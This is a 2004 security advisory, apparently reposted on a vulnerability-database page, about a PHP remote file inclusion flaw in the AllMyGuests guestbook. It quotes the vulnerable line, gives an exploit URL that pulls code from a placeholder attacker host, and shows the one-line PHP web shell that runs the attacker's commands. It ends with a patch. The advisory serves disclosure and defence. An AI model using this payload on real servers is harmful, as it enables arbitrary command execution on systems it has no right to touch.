Lucene search

K

AllMyGuests.txt

🗓️ 14 Feb 2004 00:00:00Reported by bnfxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

AllMyGuests PHP Code Injection allows command execution via manipulated server path input.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
  
******** AllMyGuests PHP Code Injection vulnerability ********  
  
Product : AllMyGuests  
Vendor : www.php-resource.net  
Date : February 14, 2004  
Problem : PHP Code Injection  
Vendor Contacted ? : No  
  
************************** Source ****************************  
  
in /include/info.inc.php  
  
--------------------------------------------------------------  
  
$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");  
  
--------------------------------------------------------------  
  
************************** Exploit ***************************  
  
http://[target]/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a  
  
in http://[attacker]/include/template.inc.php have :  
  
------------------------  
  
<?  
system($cmd);  
?>  
  
------------------------  
  
************************** Impact ****************************  
  
Malicious user execute arbitrary commands on the server .  
  
************************* Solution ***************************  
  
in /include/info.inc.php replace   
  
$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");  
  
  
for  
  
  
if (isset($_AMGconfig[cfg_serverpath])){  
die("Don\'t Hack it :)");  
}  
  
$AMG_info_get = require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");   
  
************************** Credits ****************************  
  
bnfx : [email protected]  
  
Mad_Skater : [email protected]  
  
TechTeam Brazilian Crew .  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Feb 2004 00:00Current
7.4High risk
Vulners AI Score7.4
24
.json
Report